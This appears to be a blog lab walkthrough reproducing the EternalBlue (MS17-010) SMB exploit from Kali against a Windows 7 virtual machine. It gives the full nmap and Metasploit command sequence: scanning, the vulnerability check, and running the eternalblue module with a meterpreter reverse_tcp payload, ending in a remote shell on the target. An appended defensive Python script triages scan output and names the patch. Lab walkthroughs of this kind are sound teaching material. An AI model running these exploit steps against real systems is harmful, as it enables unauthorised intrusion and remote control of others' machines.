EternalBlue (MS17-010) vulnerability reproduction
Environment
system:kali
ipaddr:192.168.10.222
netmask:255.255.255.0
gateway:192.168.10.254

system:windows 7
ipaddr:192.168.10.10
netmask:255.255.255.0
gateway:192.168.10.254
kali
Scan the host 192.168.10.10 with nmap
nmap 192.168.10.10
--------------------
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-21 18:40 EST
Nmap scan report for 192.168.10.10 # scan report for 192.168.10.10
Host is up (0.00043s latency). # the host is up
Not shown: 997 filtered tcp ports (no-response) # not shown: 997 filtered tcp ports (no response)
PORT    STATE SERVICE # port, state, service
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds # this is the port we are targeting
MAC Address: 00:0C:29:46:B5:9F (VMware) # MAC address: 00:0C:29:46:B5:9F (VMware)
Nmap scan report for 192.168.10.222 # these lines are kali's own host, ignored
Host is up (0.0000030s latency).
All 1000 scanned ports on 192.168.10.222 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
Nmap done: 256 IP addresses (2 hosts up) scanned in 32.78 seconds
--------------------

Start msf
msfconsole

Search for the ms17_010 modules
msf6 > search ms17_010 # search for the ms17_010 modules
--------------------
Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection

Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/smb/smb_ms17_010
--------------------

Select the scanner module
msf6 > use 3

Show the current module's options
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
--------------------
Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

View the full module info with the info, or info -d command.
--------------------

Set the options and run
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.10.10
rhost => 192.168.10.10
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
--------------------
[+] 192.168.10.10:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit)
[*] 192.168.10.10:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
--------------------

Select the exploit module
msf6 auxiliary(scanner/smb/smb_ms17_010) > use 0

Show the current module's options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
--------------------
Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.10.222   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


View the full module info with the info, or info -d command.
--------------------

Set the options
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.10.10
rhosts => 192.168.10.10

Launch the exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
--------------------
[*] Started reverse TCP handler on 192.168.10.222:4444
[*] 192.168.10.10:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.10.10:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit)
[*] 192.168.10.10:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.10.10:445 - The target is vulnerable.
[*] 192.168.10.10:445 - Connecting to target for exploitation.
[+] 192.168.10.10:445 - Connection established for exploitation.
[+] 192.168.10.10:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.10:445 - CORE raw buffer dump (25 bytes)
[*] 192.168.10.10:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70 Windows 7 Enterp
[*] 192.168.10.10:445 - 0x00000010 72 69 73 65 20 37 36 30 30 rise 7600
[+] 192.168.10.10:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.10:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.10.10:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.10:445 - Starting non-paged pool grooming
[+] 192.168.10.10:445 - Sending SMBv2 buffers
[+] 192.168.10.10:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.10:445 - Sending final SMBv2 buffers.
[*] 192.168.10.10:445 - Sending last fragment of exploit packet!
[*] 192.168.10.10:445 - Receiving response from exploit packet
[+] 192.168.10.10:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.10:445 - Sending egg to corrupted connection.
[*] 192.168.10.10:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 192.168.10.10
[*] Meterpreter session 1 opened (192.168.10.222:4444 -> 192.168.10.10:49161) at 2023-12-21 23:32:27 -0500
[+] 192.168.10.10:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.10:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.10:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
--------------------

View the target's IP address
meterpreter > ipconfig
--------------------
Interface 1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:46:b5:9f
MTU          : 1500
IPv4 Address : 192.168.10.10
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::75a3:353c:945f:cc77
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 12
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:c0a8:a0a
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
--------------------
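As an added example (not part of the original post, and not Metasploit's or nmap's own code), the script below reads the two outputs this walkthrough relies on, the nmap report and the smb_ms17_010 check result, the way a defender would consume them after an internal scan: it builds one finding per host, says which hosts expose SMB on TCP/445, and marks those the check flagged as likely vulnerable to MS17-010 together with the fix. The sample inputs are constructed from the output shown above; the class and function names (HostFinding, parse_nmap, apply_msf_check, triage, summarize) are this example's own.

```python
"""Triage helper for the nmap and smb_ms17_010 output in this walkthrough.

Added example: turns the two tool outputs into one finding per host so a
defender can see which hosts expose SMB on TCP/445 and which of those the
Metasploit check flagged as likely vulnerable to MS17-010.
"""
import re
from dataclasses import dataclass, field

SMB_PORT = 445

# Constructed sample: the nmap report from the walkthrough (both hosts).
NMAP_OUTPUT = """\
Nmap scan report for 192.168.10.10
Host is up (0.00043s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:46:B5:9F (VMware)
Nmap scan report for 192.168.10.222
Host is up (0.0000030s latency).
All 1000 scanned ports on 192.168.10.222 are in ignored states.
Nmap done: 256 IP addresses (2 hosts up) scanned in 32.78 seconds
"""

# Constructed sample: the smb_ms17_010 scanner output from the walkthrough.
MSF_OUTPUT = """\
[+] 192.168.10.10:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit)
[*] 192.168.10.10:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
"""

REPORT_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)")
VULN_RE = re.compile(r"^\[\+\] (\S+):\d+ - Host is likely VULNERABLE to MS17-010! - (.*)$")


@dataclass
class HostFinding:
    ip: str
    open_ports: dict = field(default_factory=dict)  # port -> nmap service name
    ms17_010: bool = False                           # set from the msf check
    os_banner: str = ""                              # OS string the check reported

    @property
    def smb_exposed(self) -> bool:
        return SMB_PORT in self.open_ports


def parse_nmap(text):
    """Collect open TCP ports per host from nmap's normal (non-XML) output."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            current = hosts.setdefault(m.group(1), HostFinding(m.group(1)))
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            current.open_ports[int(m.group(1))] = m.group(2)
    return hosts


def apply_msf_check(hosts, text):
    """Mark hosts the smb_ms17_010 module reported as likely vulnerable."""
    for line in text.splitlines():
        m = VULN_RE.match(line)
        if m:
            h = hosts.setdefault(m.group(1), HostFinding(m.group(1)))
            h.ms17_010 = True
            h.os_banner = m.group(2).strip()
    return hosts


def triage(nmap_text, msf_text):
    """Return only the hosts that need attention, sorted by address."""
    hosts = apply_msf_check(parse_nmap(nmap_text), msf_text)
    return sorted((h for h in hosts.values() if h.smb_exposed or h.ms17_010),
                  key=lambda h: h.ip)


def summarize(findings):
    """One line per host with the action a defender would take."""
    lines = []
    for h in findings:
        if h.ms17_010:
            lines.append(f"{h.ip}: likely VULNERABLE to MS17-010 ({h.os_banner}); "
                         "install the MS17-010 update and disable SMBv1")
        else:
            lines.append(f"{h.ip}: SMB exposed on {SMB_PORT}/tcp "
                         f"({h.open_ports[SMB_PORT]}); confirm MS17-010 patch level")
    return lines


if __name__ == "__main__":
    for line in summarize(triage(NMAP_OUTPUT, MSF_OUTPUT)):
        print(line)
```

The fix the summary names is what the check in this lab is testing for: the MS17-010 update closes the SMBv1 flaw the eternalblue module exploits, and disabling SMBv1 removes that code path altogether. Hosts that show 445/tcp open but were not flagged still get a line, since an unpatched host behind a filter can be missed by a single check.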
This is an original article, licensed under CC BY-NC-ND 4.0. When reposting it in full, please credit Vincent Cassano.